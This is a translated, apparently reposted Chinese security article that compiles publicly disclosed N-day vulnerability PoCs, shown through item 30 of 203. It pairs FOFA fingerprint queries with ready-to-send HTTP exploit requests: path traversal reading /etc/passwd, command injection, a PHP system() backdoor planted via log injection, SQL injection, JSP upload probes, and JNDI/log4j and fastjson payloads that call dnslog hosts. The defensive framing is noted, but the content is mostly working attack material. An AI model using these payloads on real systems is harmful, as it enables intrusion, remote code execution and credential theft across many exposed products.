Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities makes up a large share of attacks in offensive/defensive security exercises; we hope this article helps with defense. Defenders can use its contents to check their own exposure.

Vulnerability sources: This article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities are publicly disclosed; for patches or remediation guidance, contact the product vendor.

Content: Due to length limits, a few PoCs that are too long have been replaced with the word PAYLOAD; search for the full PoC yourself if needed.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's message backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; press F12 and search for keywords to use it.
Bookmark this article if you need it. You can also follow this public account (网络安全新视界).


Table of Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR Intelligent Edge Gateway userlist information disclosure
4. EasyCVR Video Management Platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 Active Safety Monitoring Cloud Platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS Smart Collaboration Platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS Digital Surveillance System user_edit.action information disclosure
19. 大华 (Dahua) DSS Digital Surveillance System attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform arbitrary file read
21. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform random remote code execution
22. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform log4j remote code execution
23. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
26. 用友 (Yonyou) NC linkVoucher SQL injection
27. 用友 (Yonyou) NC showcontent SQL injection
28. 用友 (Yonyou) NC grouptemplet arbitrary file upload
29. 用友 (Yonyou) NC down/bill SQL injection
30. 用友 (Yonyou) NC importPml SQL injection
31. 用友 (Yonyou) NC runStateServlet SQL injection
32. 用友 (Yonyou) NC complainbilldetail SQL injection
33. 用友 (Yonyou) NC downTax/download SQL injection
34. 用友 (Yonyou) NC warningDetailInfo interface SQL injection
35. 用友 (Yonyou) NC-Cloud importhttpscer arbitrary file upload
36. 用友 (Yonyou) NC-Cloud soapFormat XXE
37. 用友 (Yonyou) NC-Cloud IUpdateService XXE
38. 用友 (Yonyou) U8 Cloud smartweb2.RPC.d XXE
39. 用友 (Yonyou) U8 Cloud RegisterServlet SQL injection
40. 用友 (Yonyou) U8-Cloud XChangeServlet XXE
41. 用友 (Yonyou) U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 (Yonyou) GRP-U8 SmartUpload01 file upload
43. 用友 (Yonyou) GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 (Yonyou) GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 (Yonyou) GRP-U8 ufgovbank XXE
46. 用友 (Yonyou) GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 (Yonyou) GRP A++Cloud Government Finance Cloud arbitrary file read
48. 用友 (Yonyou) U8 CRM swfupload arbitrary file upload
49. 用友 (Yonyou) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 Social Business ERP System validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 (Chanjet) T+ getdecallusers information disclosure
56. 畅捷通 (Chanjet) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 (Chanjet) T+ keyEdit.aspx SQL injection
58. 畅捷通 (Chanjet) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart Management Platform importexport.php SQL injection
61. 浙大恩特 Customer Resource Management System fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 Management Information System CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 Smart Management Platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE Collaborative Management Platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 Project Management System Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 Service Management Platform service.action remote command execution
77. F22 Apparel Management Software UploadHandler.ashx arbitrary file upload
78. pkpmbs Construction Project Quality Supervision System FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE Operations Security Management System test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 Security Gateway aaa_local_web_preview file upload
88. 安恒 明御 Security Gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 (Seeyon) FE Collaborative Office Platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP Network Intercom Broadcast System 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) Integrated Security Management Platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) Operations Management Center session command execution
93. 奇安信 (QiAnXin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 (QiAnXin) 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD Intelligent Recording System busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 Management Platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 Management Platform import web.php arbitrary file upload
121. 北京百绰智能 S42 Management Platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 Management Platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 Engineering Quality Inspection System arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG Application Security Gateway index.php SQL injection
135. 网康 NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 Communication Command and Dispatch Platform down_file.php SQL injection
138. 福建科立讯 Communication Command and Dispatch Platform pwd_update.php SQL injection
139. 福建科立讯 Communication Command and Dispatch Platform editemedia.php SQL injection
140. 福建科立讯 Communication Command and Dispatch Platform get_extension_yl.php SQL injection
141. 福建科立讯 Communication Command and Dispatch Management Platform ajax_users.php SQL injection
142. CMSV6 Vehicle Monitoring Platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 Fire Rescue Operations Dispatch Platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 Picture Archiving and Communication System WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 Fully Intelligent Parking Fee System Webservice.asmx arbitrary file upload
162. 和丰 Multimedia Information Publishing System QH.aspx arbitrary file upload
163. 号卡极团 Distribution Management System ue_serve.php arbitrary file upload
164. 慧校园 (安校易) Management System FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 Ticketing Management Platform SeatMapHandler SQL injection
167. 精益 Value Management System DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 Vehicle Positioning Monitoring Platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point Security Gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom Gateway Configuration Management System rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C Campus Network Self-Service System flexfileupload arbitrary file upload
179. 建文 Engineering Management System arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 Enterprise Standardization Management System UpdataLogHandler.ashx SQL injection
182. 润申科技 Enterprise Standardization Management System AddNewsHandler.ashx arbitrary user creation
183. 广州图创 Library Cluster Management System updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 Application Virtualization System SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 Clinical Browsing System deleteStudy SQL injection
190. Short Video Matrix Marketing System poihuoqu arbitrary file read
191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL injection
192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 Security Management System setsystemtimeaction command execution
194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
196. 河南省风速科技 Unified Authentication Platform password reset
197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 (Founder) Omnimedia News Editing System binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload


PoC List

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR Intelligent Edge Gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR Video Management Platform arbitrary user addition
FOFA: title="EasyCVR"

Replace the password value with the MD5 of your own password.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 Active Safety Monitoring Cloud Platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"

After logging in to the backend with the default account admin, perform the following:

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. 蓝凌 (Landray) EIS Smart Collaboration Platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌 (Landray) EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain a cookie.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected code executes a function on the base64-decoded value of a request header.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target (lab) host to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The disclosed content includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The disclosed content includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The PoC calls a database function to compute the MD5 of 1234.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. 大华 (Dahua) DSS Digital Surveillance System user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 (Dahua) DSS Digital Surveillance System attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华 (Dahua) ICC Intelligent IoT Integrated Management Platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
